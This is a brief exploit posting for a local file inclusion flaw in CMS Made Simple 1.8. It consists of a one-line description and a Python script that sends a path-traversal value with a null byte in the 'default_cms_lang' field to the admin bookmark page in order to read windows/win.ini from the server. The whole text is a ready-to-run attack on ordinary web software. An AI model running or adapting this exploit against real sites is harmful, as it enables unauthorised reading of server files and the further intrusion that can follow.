CMS Made Simple 1.8 Local File Inclusion

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

Code:


import httplib, urllib 
 
host = 'localhost' 
path = '/cmsms' 
 
lfi = '../' * 32 + 'windows/win.ini\x00' 
 
c = httplib.HTTPConnection(host) 
c.request('POST', path + '/admin/addbookmark.php', 
          urllib.urlencode({ 'default_cms_lang': lfi }), 
          { 'Content-type': 'application/x-www-form-urlencoded' }) 
r = c.getresponse() 
 
print r.status, r.reason 
print r.read()